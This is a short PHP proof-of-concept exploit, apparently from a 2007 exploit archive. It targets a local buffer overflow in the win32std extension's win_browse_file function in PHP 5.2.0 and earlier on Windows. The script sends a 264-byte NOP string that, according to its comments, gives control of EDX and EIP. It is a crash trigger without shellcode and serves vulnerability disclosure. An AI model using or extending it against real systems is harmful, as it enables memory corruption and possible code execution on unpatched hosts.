
# Title : PHP <= 5.2.0 (php_win32sti) Local Buffer Overflow PoC (win32)
# Published : 2007-08-18
# Author : boecke


<?php
// ==================================================================================
//
//        php_win32sti.dll PHP <= 5.2.0 (win32) Buffer Overflow
//
//		[x] Discovery: boecke <boecke@herzeleid.net>
//		[x] Risk: Local Buffer Overflow (Medium - High Risk)
//		[x] Notes: EDX and EIP are able to be controlled and therefore
//			     have the potential to dictate program flow.
//
//		[x] "Sangre, sonando, de rabia naci.. Who do you trust?"
//
// ==================================================================================

if ( !extension_loaded("win32std") )
{
	die;
}

win_browse_file( 1, NULL, str_repeat( "\x90", 264 ), NULL, array( "*" => "*.*" ) );

?>
